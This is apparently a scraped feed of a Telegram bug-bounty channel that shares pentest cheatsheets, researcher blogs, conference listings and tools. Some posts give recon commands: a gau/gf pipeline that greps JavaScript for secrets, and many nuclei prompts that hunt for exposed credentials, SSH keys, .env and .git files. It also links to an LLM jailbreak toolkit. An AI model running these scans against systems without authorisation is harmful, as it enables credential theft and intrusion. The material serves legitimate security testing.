bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips

2246

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

🔥FRESH BB TARGET - https://visioninstitutecolorado.com/.well-known/security.txt


Bug bounty Tips

I request a small support in boosting my channel, as it helps me to be more consistent and more active...


/channel/boost/bugbounty_tech


Bug bounty Tips

Based on the poll, I have understood that the members of the group are looking for AI content too. Thanks for all the responses; I will make a plan for what content should be added here and what not.


Bug bounty Tips

Pentest References and CheatSheets

Hacking Articles
Hack Tricks
Cloud Hack Tricks
Chryzsh Pentest Book
Total OSCP Guide
Hack The Box OSCP Preparation
Steflan Security
SecWiki
Hausec
HighOnCoffee
six2dez pentest-book
0xffsec Handbook
haax's Cheatsheet
golinuxcloud
Pentest Monkey
Web App Testing Guide
XSS CheatSheet
Payload Box
Steganography Tools
Metasploit Unleashed
Payloads All The Things
Mobile Security Testing Guide
WADComs
LOLBAS
explainshell

#infosec #cybersecurity #bugbounty #pentest #cheatsheet


Bug bounty Tips

A library of tools for vibe coding
https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools


Bug bounty Tips

https://zhero-web-sec.github.io/writeups/
https://samcurry.net/
https://shubs.io/
https://dhiyaneshgeek.github.io/
https://bhavukjain.com/
https://rhynorater.github.io/
https://m0chan.github.io/
https://spaceraccoon.dev/
https://ott3rly.com/
https://www.jhaddix.com/blog
https://hackerrishad.me/


Bug bounty Tips

/channel/ChatGPT_General_Bot?start=_tgr_jAjHdy84OTAx


Bug bounty Tips

BB Target - https://cybozu.co.jp/en/company/products/bug-bounty/


Bug bounty Tips

https://www.youtube.com/watch?v=griDEeIcXQc


Bug bounty Tips

Hey Hunters,
DarkShadow here back again, just dropping a list of queries.

30K+ Search Queries 🚀
(Google | Shodan | FOFA)

For hunters, red teamers & OSINT warriors:

⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision

GitHub → https://github.com/projectdiscovery/awesome-search-queries

Show your love, guys ❤️

#bugbountytips #osint


Bug bounty Tips

Find sensitive information with gf

# Search for testing points with gau and fff (keep only .js and .json URLs)
gau target -subs | cut -d"?" -f1 | grep -E "\.js(on)?$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/

# After we save responses from known URLs, it's time to dig for secrets
for i in $(gf -list); do [[ ${i} == *_secrets* ]] && gf "${i}"; done


Bug bounty Tips

MCP Security Resources

🔗 Awesome MCP Security:
https://github.com/Puliczek/awesome-mcp-security

🔗 Defensive Guide :
https://www.infracloud.io/blogs/securing-mcp-servers/

🔗 MCP Tool :
https://github.com/eqtylab/mcp-guardian

🔗 MCP Threat Modeling :
https://www.csoonline.com/article/4023795/top-10-mcp-vulnerabilities.html

🔗 MCP Security Research :
https://arxiv.org/pdf/2507.06250

🔗 MCP Security Article :
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors

🔗 MCP Security 101 Guide :
https://www.redhat.com/en/blog/model-context-protocol-mcp-understanding-security-risks-and-controls

🔗 MCP Top Vulnerability :
https://cymulate.com/blog/cve-2025-53109-53110-escaperoute-anthropic/

🔗 MCP Security Video :
https://m.youtube.com/watch?v=zj29lslZxFg

@acesclan #mcp #agentic #ai


Bug bounty Tips

#info #Events #Cyber_Education

Cybersecurity Events Sep. - Dec. 2025:

1. Cyber-AI 2025 (Sep. 1-4)
2. Nullcon Berlin (Sep. 3-5)
3. Blue Team Con (Sep. 4-7)
4. SECCON 2025 (Sep. 9)
5. 44CON (Sep. 18-19)
6. National Cyber Summit (Sep. 23-25)
7. HackAICon 2025 (Sep. 25)
8. ESORICS 2025 (Sep. 22-26)
9. BruCON 2025 (Sep. 25-26)
10. COSAC 2025 (Sep. 28 - Oct. 2)
11. Black Hat AI Summit at SecTor (Sep. 30 - Oct. 2)
12. Hexacon 2025 (Oct. 4-5)
13. Offensive AI Con 2025 (Oct. 5-8)
14. c0c0n 2025 (Oct. 7-11)
15. Black Hat Fall Online Trainings (Oct. 20-23)
16. OWASP LASCON 2025 (Oct. 21-22)
17. IEEE ISSRE 2025 (Oct. 21-24)
18. DevSecCon 2025 (Oct. 22)
19. SAINTCON 2025 (Oct. 21-24)
20. IAPP Privacy.Security.Risk (Oct. 28-31)
21. OSINTCon 2025 (Nov. 1-2)
22. SANS Fall Cyber Solutions Fest - AI Track (Nov. 6)
23. DEATHCon (Nov. 8-9)
24. POC2025 Hacking Conference (Nov. 13-14)
25. SURICON 2025 (Nov. 19-21)
26. Black Hat Middle East & Africa (Dec. 2-4)
27. Black Hat Europe 2025 (Dec. 8-11)
28. Annual Computer Security Applications Conference (ACSAC2025) (Dec. 8-12)
29. BSidesTLV 2025 (Dec. 11)
30. SANS Cyber Defense Initiative (Dec. 12-17)


Bug bounty Tips

https://xmind.app/m/QsNUEz/


Bug bounty Tips

https://xmind.app/m/GeZhxV/


Bug bounty Tips

🔥BB TARGET - https://www.lockheedmartin.com/en-us/contact/vulnerability-disclosure-policy.html


Bug bounty Tips

https://security-books.notion.site/


Bug bounty Tips

Johnermac

>eJPT
>eCPPTv2
>PNPT
>eWPTXv2
>Active Directory Exploitation
>CRTP
>CRTE
>CLOUD
>CONTAINER

Link 🔗:-
https://johnermac.github.io/


Bug bounty Tips

#Tech_book
#Sec_code_review
"Node.js Secure Coding:
Defending Against Command Injection Vulnerabilities",
July 2023.

// Learn about secure coding practices with Node.js based on real-world CVE vulnerabilities in popular open-source npm packages: 12 Vulnerable npm Packages, 33 Self-assessment Questions, 10 Chapters


Bug bounty Tips

Automating API Vulnerability Testing Using Postman Workflows

https://haymiz.dev//security/2024/04/27/automating-apis-with-postman-workflows/


Bug bounty Tips

⚡Sn1per - Automate your recon like never before!

https://github.com/1N3/Sn1per


Bug bounty Tips

Bypass SQL union select



#Bypass #SQL


Bug bounty Tips

Don't forget to give reactions ..


Bug bounty Tips

Active Directory Pentesting

https://exploit-notes.hdks.org/exploit/windows/active-directory/


Bug bounty Tips

🔥 Find Low Hanging Fruits Using Nuclei AI 🔥

nuclei -list targets.txt -ai "Find exposed AI/ML model files (.pkl, .h5, .pt) that may leak proprietary algorithms or sensitive training data"

nuclei -list targets.txt -ai "Find exposed automation scripts (.sh, .ps1, .bat) revealing internal tooling or credentials"

nuclei -list targets.txt -ai "Identify misconfigured CSP headers allowing 'unsafe-inline' or wildcard sources"

nuclei -list targets.txt -ai "Detect pages leaking JWT tokens in URLs or cookies"

nuclei -list targets.txt -ai "Identify overly verbose error messages revealing framework or library details"

nuclei -list targets.txt -ai "Find application endpoints with verbose stack traces or source code exposure"

nuclei -list targets.txt -ai "Find sensitive information in HTML comments (debug notes, API keys, credentials)"

nuclei -list targets.txt -ai "Find exposed .env files leaking credentials, API keys, and database passwords"

nuclei -list targets.txt -ai "Find exposed configuration files such as config.json, config.yaml, config.php, application.properties containing API keys and database credentials."

nuclei -list targets.txt -ai "Find exposed configuration files containing sensitive information such as credentials, API keys, database passwords, and cloud service secrets."

nuclei -list targets.txt -ai "Find database configuration files such as database.yml, db_config.php, .pgpass, .my.cnf leaking credentials."

nuclei -list targets.txt -ai "Find exposed Docker and Kubernetes configuration files such as docker-compose.yml, kubeconfig, .dockercfg, .docker/config.json containing cloud credentials and secrets."

nuclei -list targets.txt -ai "Find exposed SSH keys and configuration files such as id_rsa, authorized_keys, and ssh_config."

nuclei -list targets.txt -ai "Find exposed WordPress configuration files (wp-config.php) containing database credentials and authentication secrets."

nuclei -list targets.txt -ai "Identify exposed .npmrc and .yarnrc files leaking NPM authentication tokens"

nuclei -list targets.txt -ai "Identify open directory listings exposing sensitive files"

nuclei -list targets.txt -ai "Find exposed .git directories allowing full repo download"

nuclei -list targets.txt -ai "Find exposed .svn and .hg repositories leaking source code"

nuclei -list targets.txt -ai "Identify open FTP servers allowing anonymous access"

nuclei -list targets.txt -ai "Find GraphQL endpoints with introspection enabled"

nuclei -list targets.txt -ai "Identify exposed .well-known directories revealing sensitive data"

nuclei -list targets.txt -ai "Find publicly accessible phpinfo() pages leaking environment details"

nuclei -list targets.txt -ai "Find exposed Swagger, Redocly, GraphiQL, and API Blueprint documentation"

nuclei -list targets.txt -ai "Identify exposed .vscode and .idea directories leaking developer configs"

nuclei -list targets.txt -ai "Detect internal IP addresses (10.x.x.x, 192.168.x.x, etc.) in HTTP responses"

nuclei -list targets.txt -ai "Find exposed WordPress debug.log files leaking credentials and error messages"

nuclei -list targets.txt -ai "Detect misconfigured CORS allowing wildcard origins ('*')"

nuclei -list targets.txt -ai "Find publicly accessible backup and log files (.log, .bak, .sql, .zip, .dump)"

nuclei -list targets.txt -ai "Find exposed admin panels with default credentials"

nuclei -list targets.txt -ai "Identify commonly used API endpoints that expose sensitive user data, returning HTTP status 200 OK."

nuclei -list targets.txt -ai "Detect web applications running in debug mode, potentially exposing sensitive system information."


Bug bounty Tips

⚡Automated red-team toolkit for stress-testing LLM defences - Vector Attacks on LLMs

https://github.com/MrMoshkovitz/gandalf-llm-pentester


Bug bounty Tips

Google 🔍 Engineer dropped a book. A comprehensive guide to building agentic AI systems.

Key points:


Concepts: Prompt chaining, routing, memory, planning, safety, and evaluation.

✅Patterns: Design methods for multi-agent setups, tool-using agents, and autonomous workflows.

✅Hands-on: Code samples for implementing these patterns in real-world apps.

✅Goal: Help developers build reliable, scalable, and safe intelligent agents.

Think of it as a playbook for advanced AI agent design.


📱https://docs.google.com/document/d/1rsaK53T3Lg5KoGwvf8ukOUvbELRtH-V0LnOIFDxBryE/mobilebasic


Bug bounty Tips

#Tech_book
"Advanced Python for Cybersecurity:
Techniques in Malware Analysis, Exploit Development, and Custom Tool Creation",
2024.

// By integrating Python into your cybersecurity arsenal, you can automate repetitive tasks, enhance your analytical capabilities, forge custom tools tailored to specific threats, and ultimately fortify your defenses against an ever-evolving adversary


Bug bounty Tips

https://xmind.app/m/XM7KaG/


Bug bounty Tips

https://xmind.app/m/bULg/
